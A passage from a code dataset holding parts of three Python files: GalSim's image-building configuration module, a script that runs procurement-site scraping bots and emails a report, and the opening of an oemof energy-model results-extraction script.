nim_per_task = min_nim * int(math.sqrt(float(max_nim) / float(min_nim)))\n #print 'nim_per_task = ',nim_per_task\n\n # Set up the task list\n task_queue = Queue()\n for k in range(0,nimages,nim_per_task):\n # Send kwargs, config, im_num, nim, k\n if k + nim_per_task > nimages:\n task_queue.put( ( kwargs, config, image_num+k, obj_num, nimages-k, k ) )\n else:\n task_queue.put( ( kwargs, config, image_num+k, obj_num, nim_per_task, k ) )\n for i in range(nim_per_task):\n obj_num += galsim.config.GetNObjForImage(config, image_num+k+i)\n\n # Run the tasks\n # Each Process command starts up a parallel process that will keep checking the queue \n # for a new task. If there is one there, it grabs it and does it. If not, it waits \n # until there is one to grab. When it finds a 'STOP', it shuts down. \n done_queue = Queue()\n p_list = []\n for j in range(nproc):\n p = Process(target=worker, args=(task_queue, done_queue), name='Process-%d'%(j+1))\n p.start()\n p_list.append(p)\n\n # In the meanwhile, the main process keeps going. We pull each set of images off of the \n # done_queue and put them in the appropriate place in the lists.\n # This loop is happening while the other processes are still working on their tasks.\n # You'll see that these logging statements get print out as the stamp images are still \n # being drawn. \n for i in range(0,nimages,nim_per_task):\n results, k, proc = done_queue.get()\n for result in results:\n images[k] = result[0]\n psf_images[k] = result[1]\n weight_images[k] = result[2]\n badpix_images[k] = result[3]\n if logger:\n # Note: numpy shape is y,x\n ys, xs = result[0].array.shape\n t = result[4]\n logger.info('%s: Image %d: size = %d x %d, time = %f sec', \n proc, image_num+k, xs, ys, t)\n k += 1\n\n # Stop the processes\n # The 'STOP's could have been put on the task list before starting the processes, or you\n # can wait. In some cases it can be useful to clear out the done_queue (as we just did)\n # and then add on some more tasks. We don't need that here, but it's perfectly fine to do.\n # Once you are done with the processes, putting nproc 'STOP's will stop them all.\n # This is important, because the program will keep running as long as there are running\n # processes, even if the main process gets to the end. So you do want to make sure to \n # add those 'STOP's at some point!\n for j in range(nproc):\n task_queue.put('STOP')\n for j in range(nproc):\n p_list[j].join()\n task_queue.close()\n\n else : # nproc == 1\n\n images = []\n psf_images = []\n weight_images = []\n badpix_images = []\n\n for k in range(nimages):\n t1 = time.time()\n kwargs['config'] = config\n kwargs['image_num'] = image_num+k\n kwargs['obj_num'] = obj_num\n kwargs['logger'] = logger\n result = BuildImage(**kwargs)\n images += [ result[0] ]\n psf_images += [ result[1] ]\n weight_images += [ result[2] ]\n badpix_images += [ result[3] ]\n t2 = time.time()\n if logger:\n # Note: numpy shape is y,x\n ys, xs = result[0].array.shape\n logger.info('Image %d: size = %d x %d, time = %f sec', image_num+k, xs, ys, t2-t1)\n obj_num += galsim.config.GetNObjForImage(config, image_num+k)\n\n if logger:\n logger.debug('Done making images')\n\n return images, psf_images, weight_images, badpix_images\n \n\ndef BuildImage(config, logger=None, image_num=0, obj_num=0,\n make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n \"\"\"\n Build an image according to the information in config.\n\n This function acts as a wrapper for:\n BuildSingleImage \n BuildTiledImage \n BuildScatteredImage \n choosing between these three using the contents of config if specified (default = Single)\n\n @param config A configuration dict.\n @param logger If given, a logger object to log progress.\n @param image_num If given, the current image_num (default = 0)\n @param obj_num If given, the current obj_num (default = 0)\n @param make_psf_image Whether to make psf_image.\n @param make_weight_image Whether to make weight_image.\n @param make_badpix_image Whether to make badpix_image.\n\n @return (image, psf_image, weight_image, badpix_image) \n\n Note: All 4 images are always returned in the return tuple,\n but the latter 3 might be None depending on the parameters make_*_image.\n \"\"\"\n # Make config['image'] exist if it doesn't yet.\n if 'image' not in config:\n config['image'] = {}\n image = config['image']\n if not isinstance(image, dict):\n raise AttributeError(\"config.image is not a dict.\")\n\n # Normally, random_seed is just a number, which really means to use that number\n # for the first item and go up sequentially from there for each object.\n # However, we allow for random_seed to be a gettable parameter, so for the \n # normal case, we just convert it into a Sequence.\n if 'random_seed' in image and not isinstance(image['random_seed'],dict):\n first_seed = galsim.config.ParseValue(image, 'random_seed', config, int)[0]\n image['random_seed'] = { 'type' : 'Sequence' , 'first' : first_seed }\n\n if 'draw_method' not in image:\n image['draw_method'] = 'fft'\n\n if 'type' not in image:\n image['type'] = 'Single' # Default is Single\n type = image['type']\n\n valid_types = [ 'Single', 'Tiled', 'Scattered' ]\n if type not in valid_types:\n raise AttributeError(\"Invalid image.type=%s.\"%type)\n\n build_func = eval('Build' + type + 'Image')\n all_images = build_func(\n config=config, logger=logger,\n image_num=image_num, obj_num=obj_num,\n make_psf_image=make_psf_image, \n make_weight_image=make_weight_image,\n make_badpix_image=make_badpix_image)\n\n # The later image building functions build up the weight image as the total variance \n # in each pixel. We need to invert this to produce the inverse variance map.\n # Doing it here means it only needs to be done in this one place.\n if all_images[2]:\n all_images[2].invertSelf()\n\n return all_images\n\n\ndef BuildSingleImage(config, logger=None, image_num=0, obj_num=0,\n make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n \"\"\"\n Build an image consisting of a single stamp\n\n @param config A configuration dict.\n @param logger If given, a logger object to log progress.\n @param image_num If given, the current image_num (default = 0)\n @param obj_num If given, the current obj_num (default = 0)\n @param make_psf_image Whether to make psf_image.\n @param make_weight_image Whether to make weight_image.\n @param make_badpix_image Whether to make badpix_image.\n\n @return (image, psf_image, weight_image, badpix_image) \n\n Note: All 4 images are always returned in the return tuple,\n but the latter 3 might be None depending on the parameters make_*_image. \n \"\"\"\n config['seq_index'] = image_num\n\n ignore = [ 'draw_method', 'noise', 'wcs', 'nproc' , 'random_seed' ]\n opt = { 'size' : int , 'xsize' : int , 'ysize' : int ,\n 'pixel_scale' : float , 'sky_level' : float }\n params = galsim.config.GetAllParams(\n config['image'], 'image', config, opt=opt, ignore=ignore)[0]\n\n # If image_xsize and image_ysize were set in config, this overrides the read-in params.\n if 'image_xsize' in config and 'image_ysize' in config:\n xsize = config['image_xsize']\n ysize = config['image_ysize']\n else:\n size = params.get('size',0)\n xsize = params.get('xsize',size)\n ysize = params.get('ysize',size)\n\n if (xsize == 0) != (ysize == 0):\n raise AttributeError(\n \"Both (or neither) of image.xsize and image.ysize need to be defined and != 0.\")\n\n pixel_scale = params.get('pixel_scale',1.0)\n config['pixel_scale'] = pixel_scale\n if 'pix' not in config:\n config['pix'] = { 'type' : 'Pixel' , 'xw' : pixel_scale }\n\n sky_level = params.get('sky_level',None)\n\n return galsim.config.BuildSingleStamp(\n config=config, xsize=xsize, ysize=ysize, obj_num=obj_num,\n sky_level=sky_level, do_noise=True, logger=logger,\n make_psf_image=make_psf_image, \n make_weight_image=make_weight_image,\n make_badpix_image=make_badpix_image)\n\n\ndef BuildTiledImage(config, logger=None, image_num=0, obj_num=0,\n make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n \"\"\"\n Build an image consisting of a tiled array of postage stamps\n\n @param config A configuration dict.\n @param logger If given, a logger object to log progress.\n @param image_num If given, the current image_num (default = 0)\n @param obj_num If given, the current obj_num (default = 0)\n @param make_psf_image Whether to make psf_image.\n @param make_weight_image Whether to make weight_image.\n @param make_badpix_image Whether to make badpix_image.\n\n @return (image, psf_image, weight_image, badpix_image) \n\n Note: All 4 images are always returned in the return tuple,\n but the latter 3 might be None depending on the parameters make_*_image. \n \"\"\"\n config['seq_index'] = image_num\n\n ignore = [ 'random_seed', 'draw_method', 'noise', 'wcs', 'nproc', 'center' ]\n req = { 'nx_tiles' : int , 'ny_tiles' : int }\n opt = { 'stamp_size' : int , 'stamp_xsize' : int , 'stamp_ysize' : int ,\n 'border' : int , 'xborder' : int , 'yborder' : int ,\n 'pixel_scale' : float , 'nproc' : int , 'sky_level' : float, \n 'order' : str }\n params = galsim.config.GetAllParams(\n config['image'], 'image', config, req=req, opt=opt, ignore=ignore)[0]\n\n nx_tiles = params['nx_tiles']\n ny_tiles = params['ny_tiles']\n nobjects = nx_tiles * ny_tiles\n\n stamp_size = params.get('stamp_size',0)\n stamp_xsize = params.get('stamp_xsize',stamp_size)\n stamp_ysize = params.get('stamp_ysize',stamp_size)\n\n if (stamp_xsize == 0) or (stamp_ysize == 0):\n raise AttributeError(\n \"Both image.stamp_xsize and image.stamp_ysize need to be defined and != 0.\")\n\n border = params.get(\"border\",0)\n xborder = params.get(\"xborder\",border)\n yborder = params.get(\"yborder\",border)\n\n sky_level = params.get('sky_level',None)\n\n do_noise = xborder >= 0 and yborder >= 0\n # TODO: Note: if one of these is < 0 and the other is > 0, then\n # this will add noise to the border region. Not exactly the \n # design, but I didn't bother to do the bookkeeping right to \n # make the borders pure 0 in that case.\n \n full_xsize = (stamp_xsize + xborder) * nx_tiles - xborder\n full_ysize = (stamp_ysize + yborder) * ny_tiles - yborder\n\n # If image_xsize and image_ysize were set in config, make sure it matches.\n if ( 'image_xsize' in config and 'image_ysize' in config and\n (full_xsize != config['image_xsize'] or full_ysize != config['image_ysize']) ):\n raise ValueError(\n \"Unable to reconcile saved image_xsize and image_ysize with provided \"+\n \"nx_tiles=%d, ny_tiles=%d, \"%(nx_tiles,ny_tiles) +\n \"xborder=%d, yborder=%d\\n\"%(xborder,yborder) +\n \"Calculated full_size = (%d,%d) \"%(full_xsize,full_ysize)+\n \"!= required (%d,%d).\"%(config['image_xsize'],config['image_ysize']))\n\n pixel_scale = params.get('pixel_scale',1.0)\n config['pixel_scale'] = pixel_scale\n if 'pix' not in config:\n config['pix'] = { 'type' : 'Pixel' , 'xw' : pixel_scale }\n\n # Set the rng to use for image stuff.\n if 'random_seed' in config['image']:\n config['seq_index'] = obj_num+nobjects\n # Technically obj_num+nobjects will be the index of the random seed used for the next \n # image's first object (if there is a next image). But I don't think that will have \n # any adverse effects.\n seed = galsim.config.ParseValue(config['image'], 'random_seed', config, int)[0]\n rng = galsim.BaseDeviate(seed)\n else:\n rng = galsim.BaseDeviate()\n\n # If we have a power spectrum in config, we need to get a new realization at the start\n # of each image.\n if 'power_spectrum' in config:\n # PowerSpectrum can only do a square FFT, so make it the larger of the two n's.\n n_tiles = max(nx_tiles, ny_tiles)\n stamp_size = max(stamp_xsize, stamp_ysize)\n grid_dx = stamp_size * pixel_scale\n\n config['power_spectrum'].getShear(grid_spacing=grid_dx, grid_nx=n_tiles, rng=rng)\n # We don't care about the output here. This just builds the grid, which we'll\n # access for each object using its position.\n\n # Make a list of ix,iy values according to the specified order:\n order = params.get('order','row').lower()\n if order.startswith('row'):\n ix_list = [ ix for iy in range(ny_tiles) for ix in range(nx_tiles) ]\n iy_list = [ iy for iy in range(ny_tiles) for ix in range(nx_tiles) ]\n elif order.startswith('col'):\n ix_list = [ ix for ix in range(nx_tiles) for iy in range(ny_tiles) ]\n iy_list = [ iy for ix in range(nx_tiles) for iy in range(ny_tiles) ]\n elif order.startswith('rand'):\n ix_list = [ ix for ix in range(nx_tiles) for iy in range(ny_tiles) ]\n iy_list = [ iy for ix in range(nx_tiles) for iy in range(ny_tiles) ]\n galsim.random.permute(rng, ix_list, iy_list)\n \n # Define a 'center' field so the stamps can set their position appropriately in case\n # we need it for PowerSpectum or NFWHalo.\n config['image']['center'] = { \n 'type' : 'XY' ,\n 'x' : { 'type' : 'List',\n 'items' : [ ix * (stamp_xsize+xborder) + stamp_xsize/2 + 1 for ix in ix_list ]\n },\n 'y' : { 'type' : 'List',\n 'items' : [ iy * (stamp_ysize+yborder) + stamp_ysize/2 + 1 for iy in iy_list ]\n }\n }\n\n nproc = params.get('nproc',1)\n\n full_image = galsim.ImageF(full_xsize,full_ysize)\n full_image.setZero()\n full_image.setScale(pixel_scale)\n\n # Also define the overall image center, since we need that to calculate the position \n # of each stamp relative to the center.\n image_cen = full_image.bounds.center()\n config['image_cen'] = galsim.PositionD(image_cen.x,image_cen.y)\n\n if make_psf_image:\n full_psf_image = galsim.ImageF(full_xsize,full_ysize)\n full_psf_image.setZero()\n full_psf_image.setScale(pixel_scale)\n else:\n full_psf_image = None\n\n if make_weight_image:\n full_weight_image = galsim.ImageF(full_xsize,full_ysize)\n full_weight_image.setZero()\n full_weight_image.setScale(pixel_scale)\n else:\n full_weight_image = None\n\n if make_badpix_image:\n full_badpix_image = galsim.ImageS(full_xsize,full_ysize)\n full_badpix_image.setZero()\n full_badpix_image.setScale(pixel_scale)\n else:\n full_badpix_image = None\n\n stamp_images = galsim.config.BuildStamps(\n nobjects=nobjects, config=config,\n xsize=stamp_xsize, ysize=stamp_ysize, obj_num=obj_num, \n nproc=nproc, sky_level=sky_level, do_noise=do_noise, logger=logger,\n make_psf_image=make_psf_image,\n make_weight_image=make_weight_image,\n make_badpix_image=make_badpix_image)\n\n images = stamp_images[0]\n psf_images = stamp_images[1]\n weight_images = stamp_images[2]\n badpix_images = stamp_images[3]\n\n for k in range(nobjects):\n ix = ix_list[k]\n iy = iy_list[k]\n xmin = ix * (stamp_xsize + xborder) + 1\n xmax = xmin + stamp_xsize-1\n ymin = iy * (stamp_ysize + yborder) + 1\n ymax = ymin + stamp_ysize-1\n b = galsim.BoundsI(xmin,xmax,ymin,ymax)\n full_image[b] += images[k]\n if make_psf_image:\n full_psf_image[b] += psf_images[k]\n if make_weight_image:\n full_weight_image[b] += weight_images[k]\n if make_badpix_image:\n full_badpix_image[b] |= badpix_images[k]\n\n if not do_noise:\n if 'noise' in config['image']:\n # If we didn't apply noise in each stamp, then we need to apply it now.\n draw_method = galsim.config.GetCurrentValue(config['image'],'draw_method')\n if draw_method == 'fft':\n galsim.config.AddNoiseFFT(\n full_image,full_weight_image,config['image']['noise'],config,rng,sky_level)\n elif draw_method == 'phot':\n galsim.config.AddNoisePhot(\n full_image,full_weight_image,config['image']['noise'],config,rng,sky_level)\n else:\n raise AttributeError(\"Unknown draw_method %s.\"%draw_method)\n elif sky_level:\n # If we aren't doing noise, we still need to add a non-zero sky_level\n full_image += sky_level * pixel_scale**2\n\n return full_image, full_psf_image, full_weight_image, full_badpix_image\n\n\ndef BuildScatteredImage(config, logger=None, image_num=0, obj_num=0,\n make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n \"\"\"\n Build an image containing multiple objects placed at arbitrary locations.\n\n @param config A configuration dict.\n @param logger If given, a logger object to log progress.\n @param image_num If given, the current image_num (default = 0)\n @param obj_num If given, the current obj_num (default = 0)\n @param make_psf_image Whether to make psf_image.\n @param make_weight_image Whether to make weight_image.\n @param make_badpix_image Whether to make badpix_image.\n\n @return (image, psf_image, weight_image, badpix_image) \n\n Note: All 4 images are always returned in the return tuple,\n but the latter 3 might be None depending on the parameters make_*_image. \n \"\"\"\n config['seq_index'] = image_num\n\n ignore = [ 'random_seed', 'draw_method', 'noise', 'wcs', 'nproc' , 'center' ]\n req = { 'nobjects' : int }\n opt = { 'size' : int , 'xsize' : int , 'ysize' : int , \n 'stamp_size' : int , 'stamp_xsize' : int , 'stamp_ysize' : int ,\n 'pixel_scale' : float , 'nproc' : int , 'sky_level' : float }\n params = galsim.config.GetAllParams(\n config['image'], 'image', config, req=req, opt=opt, ignore=ignore)[0]\n\n nobjects = params['nobjects']\n\n # Special check for the size. Either size or both xsize and ysize is required.\n if 'size' not in params:\n if 'xsize' not in params or 'ysize' not in params:\n raise AttributeError(\n \"Either attribute size or both xsize and ysize required for image.type=Scattered\")\n full_xsize = params['xsize']\n full_ysize = params['ysize']\n else:\n if 'xsize' in params:\n raise AttributeError(\n \"Attributes xsize is invalid if size is set for image.type=Scattered\")\n if 'ysize' in params:\n raise AttributeError(\n \"Attributes ysize is invalid if size is set for image.type=Scattered\")\n full_xsize = params['size']\n full_ysize = params['size']\n\n stamp_size = params.get('stamp_size',0)\n stamp_xsize = params.get('stamp_xsize',stamp_size)\n stamp_ysize = params.get('stamp_ysize',stamp_size)\n\n sky_level = params.get('sky_level',None)\n\n # If image_xsize and image_ysize were set in config, make sure it matches.\n if ( 'image_xsize' in config and 'image_ysize' in config and\n (full_xsize != config['image_xsize'] or full_ysize != config['image_ysize']) ):\n raise ValueError(\n \"Unable to reconcile saved image_xsize and image_ysize with provided \"+\n \"xsize=%d, ysize=%d, \"%(full_xsize,full_ysize))\n\n pixel_scale = params.get('pixel_scale',1.0)\n config['pixel_scale'] = pixel_scale\n if 'pix' not in config:\n config['pix'] = { 'type' : 'Pixel' , 'xw' : pixel_scale }\n\n # Set the rng to use for image stuff.\n if 'random_seed' in config['image']:\n config['seq_index'] = obj_num+nobjects\n # Technically obj_num+nobjects will be the index of the random seed used for the next \n # image's first object (if there is a next image). But I don't think that will have \n # any adverse effects.\n seed = galsim.config.ParseValue(config['image'], 'random_seed', config, int)[0]\n rng = galsim.BaseDeviate(seed)\n else:\n rng = galsim.BaseDeviate()\n\n # If we have a power spectrum in config, we need to get a new realization at the start\n # of each image.\n if 'power_spectrum' in config:\n # TODO: For now we use a grid spacing of 1/20 of the full size. We are eventually\n # going to have a better way to calculate a good grid spacing. c.f. Issue #248.\n full_size = max(full_xsize, full_ysize)\n grid_dx = full_size * pixel_scale / 20.\n grid_nx = 21\n\n config['power_spectrum'].getShear(grid_spacing=grid_dx, grid_nx=grid_nx, rng=rng)\n # We don't care about the output here. This just builds the grid, which we'll\n # access for each object using its position.\n\n if 'center' not in config['image']:\n config['image']['center'] = { \n 'type' : 'XY' ,\n 'x' : { 'type' : 'Random' , 'min' : 1 , 'max' : full_xsize },\n 'y' : { 'type' : 'Random' , 'min' : 1 , 'max' : full_ysize }\n }\n\n nproc = params.get('nproc',1)\n\n full_image = galsim.ImageF(full_xsize,full_ysize)\n full_image.setZero()\n full_image.setScale(pixel_scale)\n\n # Also define the overall image center, since we need that to calculate the position \n # of each stamp relative to the center.\n image_cen = full_image.bounds.center()\n config['image_cen'] = galsim.PositionD(image_cen.x,image_cen.y)\n\n if make_psf_image:\n full_psf_image = galsim.ImageF(full_xsize,full_ysize)\n full_psf_image.setZero()\n full_psf_image.setScale(pixel_scale)\n else:\n full_psf_image = None\n\n if make_weight_image:\n full_weight_image = galsim.ImageF(full_xsize,full_ysize)\n full_weight_image.setZero()\n full_weight_image.setScale(pixel_scale)\n else:\n full_weight_image = None\n\n if make_badpix_image:\n full_badpix_image = galsim.ImageS(full_xsize,full_ysize)\n full_badpix_image.setZero()\n full_badpix_image.setScale(pixel_scale)\n else:\n full_badpix_image = None\n\n stamp_images = galsim.config.BuildStamps(\n nobjects=nobjects, config=config,\n xsize=stamp_xsize, ysize=stamp_ysize, obj_num=obj_num,\n nproc=nproc, sky_level=sky_level, do_noise=False, logger=logger,\n make_psf_image=make_psf_image,\n make_weight_image=make_weight_image,\n make_badpix_image=make_badpix_image)\n\n images = stamp_images[0]\n psf_images = stamp_images[1]\n weight_images = stamp_images[2]\n badpix_images = stamp_images[3]\n\n for k in range(nobjects):\n bounds = images[k].bounds & full_image.bounds\n #print 'stamp bounds = ',images[k].bounds\n #print 'full bounds = ',full_image.bounds\n #print 'Overlap = ',bounds\n if bounds.isDefined():\n full_image[bounds] += images[k][bounds]\n if make_psf_image:\n full_psf_image[bounds] += psf_images[k][bounds]\n if make_weight_image:\n full_weight_image[bounds] += weight_images[k][bounds]\n if make_badpix_image:\n full_badpix_image[bounds] |= badpix_images[k][bounds]\n else:\n if logger:\n logger.warn(\n \"Object centered at (%d,%d) is entirely off the main image,\\n\"%(\n images[k].bounds.center().x, images[k].bounds.center().y) +\n \"whose bounds are (%d,%d,%d,%d).\"%(\n full_image.bounds.xmin, full_image.bounds.xmax,\n full_image.bounds.ymin, full_image.bounds.ymax))\n\n if 'noise' in config['image']:\n # Apply the noise to the full image\n draw_method = galsim.config.GetCurrentValue(config['image'],'draw_method')\n if draw_method == 'fft':\n galsim.config.AddNoiseFFT(\n full_image,full_weight_image,config['image']['noise'],config,rng,sky_level)\n elif draw_method == 'phot':\n galsim.config.AddNoisePhot(\n full_image,full_weight_image,config['image']['noise'],config,rng,sky_level)\n else:\n raise AttributeError(\"Unknown draw_method %s.\"%draw_method)\n\n elif sky_level:\n # If we aren't doing noise, we still need to add a non-zero sky_level\n full_image += sky_level * pixel_scale**2\n\n return full_image, full_psf_image, full_weight_image, full_badpix_image\n\n\n\n","sub_path":"galsim/config/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":30103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"500448914","text":"from AdvDAB import AdvDAB\nfrom LaAdvDAB import LaAdvDAB\nfrom VaAdvDAB import VaAdvDAB\nfrom MiAdvDAB import MiAdvDAB\nimport smtplib # Import smtplib for the actual sending function\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\ndef email_report(report):\n me = \"adamchangadvertising@gmail.com\"\n you = \"stephen@bidprime.com\"\n cc = \"josh2xg@gmail.com\"\n recipients = [you, cc]\n\n # Create message container - the correct MIME type is multipart/alternative.\n msg = MIMEMultipart('alternative')\n msg['Subject'] = \"DAB Report\"\n msg['From'] = me\n msg['To'] = you\n msg['CC'] = cc\n\n report_body = MIMEText(report, 'plain')\n msg.attach(report_body)\n mailserver = smtplib.SMTP('smtp.gmail.com',587)\n mailserver.ehlo() # re-identify ourselves as an encrypted connection\n mailserver.starttls() # secure our email with tls encryption\n mailserver.login(me, 'pwd')\n mailserver.sendmail(me, recipients, msg.as_string())\n mailserver.quit()\n return\n\ndef conduct():\n # dab_input_list = \\\n # [AdvDAB('Advantage Site: Honolulu 0', 'https://www5.honolulu.gov/webapp/VSSPSRV1/AltSelfService', False, True)]\n\n # dab_input_list = \\\n # [AdvDAB('Advantage Site: Fulton Georgia 0', 'https://www.fultonvendorselfservice.co.fulton.ga.us/webapp/VSSPROD/AltSelfService', False, True)]\n\n # dab_input_list = \\\n # [AdvDAB('Advantage Site: Fulton Georgia 0', 'https://www.fultonvendorselfservice.co.fulton.ga.us/webapp/VSSPROD/AltSelfService', False, True),\n # AdvDAB('Advantage Site: Kentucky 0', 'https://emars.ky.gov/webapp/vssonline/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Dallas 0', 'https://bids.dallascityhall.com/webapp/VSSPROD/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Honolulu 0', 'https://www5.honolulu.gov/webapp/VSSPSRV1/AltSelfService', True, True),\n # AdvDAB('Advantage Site: West Viriginia 0', 'https://prod-fin-vss.wvoasis.gov/webapp/prdvss11/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Colorado 0', 'http://colorado.gov/vss', True, True),\n # AdvDAB('Advantage Site: Alabama 0', 'https://procurement.staars.alabama.gov/webapp/PRDVSS1X1/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Alaska 0', 'https://iris-vss.alaska.gov/webapp/PRDVSS1X1/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Iowa 0', 'https://vss.iowa.gov/webapp/VSS_ON/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Palm Beach 0', 'https://pbcvssp.co.palm-beach.fl.us/webapp/vssp/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Grand Rapids 0', 'https://cgiadvantage360.cgi.com/MICGR/AltSelfService', True, True),\n # # LaAdvDAB('Advantage Site Variant: Los Angeles 0', 'https://lacovss.lacounty.gov/webapp/VSSPSRV11/AltSelfService', True),\n # # MiAdvDAB('Advantage Site Variant: Michigan 0', 'https://sigma.michigan.gov/webapp/PRDVSS2X1/AltSelfService', True, 30),\n # # VaAdvDAB('Advantage Site Variant: Virginia 0', 'https://vendor.epro.cgipdc.com/loginEngine/index.jsp?guest_login=Public%20Access&Destination=x&openDoc=&', False, 10)\n # ]\n headless_opt = False\n dab_input_list = \\\n [AdvDAB('Advantage Site: Fulton Georgia 0', 'https://www.fultonvendorselfservice.co.fulton.ga.us/webapp/VSSPROD/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Kentucky 0', 'https://emars.ky.gov/webapp/vssonline/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Dallas 0', 'https://bids.dallascityhall.com/webapp/VSSPROD/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Honolulu 0', 'https://www5.honolulu.gov/webapp/VSSPSRV1/AltSelfService'), headless_opt,\n AdvDAB('Advantage Site: West Viriginia 0', 'https://prod-fin-vss.wvoasis.gov/webapp/prdvss11/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Colorado 0', 'http://colorado.gov/vss', headless_opt),\n AdvDAB('Advantage Site: Alabama 0', 'https://procurement.staars.alabama.gov/webapp/PRDVSS1X1/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Alaska 0', 'https://iris-vss.alaska.gov/webapp/PRDVSS1X1/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Iowa 0', 'https://vss.iowa.gov/webapp/VSS_ON/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Palm Beach 0', 'https://pbcvssp.co.palm-beach.fl.us/webapp/vssp/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Grand Rapids 0', 'https://cgiadvantage360.cgi.com/MICGR/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Cincinnati 0', 'https://vss.cincinnati-oh.gov/webapp/VSSPROD/AltSelfService', headless_opt),\n AdvDAB('Advantage Site: Maine 0', 'https://mevss.hostams.com/webapp/PRDVSS2X1/AltSelfService', headless_opt),\n LaAdvDAB('Advantage Site Variant: Los Angeles 0', 'https://lacovss.lacounty.gov/webapp/VSSPSRV11/AltSelfService', headless_opt),\n MiAdvDAB('Advantage Site Variant: Michigan 0', 'https://sigma.michigan.gov/webapp/PRDVSS2X1/AltSelfService', headless_opt, 30), \n VaAdvDAB('Advantage Site Variant: Virginia 0', 'https://vendor.epro.cgipdc.com/loginEngine/index.jsp?guest_login=Public%20Access&Destination=x&openDoc=&', headless_opt, 20)\n ]\n sendReportByEmail = True\n successes = []\n failures = []\n for data_acquisition_bot in dab_input_list:\n name = data_acquisition_bot.name\n uri = data_acquisition_bot.uri\n result = data_acquisition_bot.dab()\n if result:\n successes.append((name,uri, data_acquisition_bot.debug_msgs))\n else:\n failures.append((name,uri, data_acquisition_bot.debug_msgs))\n if sendReportByEmail:\n report = \"%s SUCCESSES and %s FAILURES\\n\\n\" % (len(successes), len(failures))\n success_report = \"%s SUCCESSES:\\n\" % len(successes)\n for success in successes:\n name, uri, debug_msgs = success\n success_report += \"\\t%s%s\\n\" % (name, uri)\n for msg in debug_msgs:\n success_report += \"\\t\\t%s\\n\" %(msg)\n failure_report = \"%s FAILURES:\\n\" % len(failures)\n for failure in failures:\n name, uri, debug_msgs = failure\n failure_report += \"\\t%s%s\\n\" % (name, uri)\n for msg in debug_msgs:\n failure_report += \"\\t\\t%s\\n\" %(msg)\n report = report + success_report + failure_report\n email_report(report)\n \nif __name__ == \"__main__\":\n conduct()\n\n","sub_path":"Conductor.py","file_name":"Conductor.py","file_ext":"py","file_size_in_byte":6353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"76330934","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\nimport oemof.solph as solph\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib.ticker as ticker\n\nimport os\nimport pandas as pd\nimport numpy as np\nfrom pandas.plotting import register_matplotlib_converters\n\n# register matplotlib converters which have been overwritten by pandas\nregister_matplotlib_converters()\n\n\n#################################################################\n\ndef make_directory(folder_name):\n existing_folders = next(os.walk('.'))[1]\n if folder_name in existing_folders:\n print('----------------------------------------------------------')\n print('Folder \"' + folder_name + '\" already exists in current directory.')\n print('----------------------------------------------------------')\n else:\n path = \"./\" + folder_name\n os.mkdir(path)\n print('----------------------------------------------------------')\n print('Created folder \"' + folder_name + '\" in current directory.')\n print('----------------------------------------------------------')\n\n\ndef adjust_yaxis(ax, ydif, v):\n \"\"\"shift axis ax by ydiff, maintaining point v at the same location\"\"\"\n inv = ax.transData.inverted()\n _, dy = inv.transform((0, 0)) - inv.transform((0, ydif))\n miny, maxy = ax.get_ylim()\n miny, maxy = miny - v, maxy - v\n if -miny > maxy or (-miny == maxy and dy > 0):\n nminy = miny\n nmaxy = miny * (maxy + dy) / (miny + dy)\n else:\n nmaxy = maxy\n nminy = maxy * (miny + dy) / (maxy + dy)\n ax.set_ylim(nminy + v, nmaxy + v)\n\n\ndef align_yaxis(ax1, v1, ax2, v2):\n \"\"\"adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1\"\"\"\n _, y1 = ax1.transData.transform((0, v1))\n _, y2 = ax2.transData.transform((0, v2))\n adjust_yaxis(ax2, (y1 - y2) / 2, v2)\n adjust_yaxis(ax1, (y2 - y1) / 2, v1)\n\n\ndef extract_results(model, approach, **kwargs):\n \"\"\" Extract data fro Pyomo Variables in DataFrames and plot for visualization.\n\n Extract the results from the toy model.\n A distinction for the different approaches has to be made since\n the demand response variables and the way they are handled vary.\n\n :param model: oemof.solph.models.Model\n The solved optimization model (including results)\n :param approach: str\n Must be one of [\"DIW\", \"IER\", \"DLR\", \"TUD\"]\n :return: df_model: pd.DataFrame\n A pd.DataFrame containing the concatenated and renamed results sequences\n \"\"\"\n\n # ########################### Get DataFrame out of Pyomo and rename series\n\n # TODO: Add results extraction and plotting for cases with more than one DSM unit\n # Determine amount of DSM units\n # introduce_second_dsm_unit = kwargs.get('introduce_second_dsm_unit', False)\n\n # Determine which generation results to exctract\n include_coal = kwargs.get('include_coal', True)\n include_gas = kwargs.get('include_gas', False)\n\n # Introduce shorcuts\n bus_elec_seqs = solph.views.node(model.es.results['main'], 'bus_elec')['sequences']\n dsm_seqs = solph.views.node(model.es.results['main'], 'demand_dsm')['sequences']\n\n # Generators coal\n if include_coal:\n df_coal_1 = bus_elec_seqs[\n (('pp_coal_1', 'bus_elec'), 'flow')].rename('coal1', inplace=True)\n else:\n df_coal_1 = pd.Series(index=bus_elec_seqs.index)\n\n if include_gas:\n df_gas_1 = bus_elec_seqs[\n (('pp_gas_1', 'bus_elec'), 'flow')].rename('gas1', inplace=True)\n else:\n 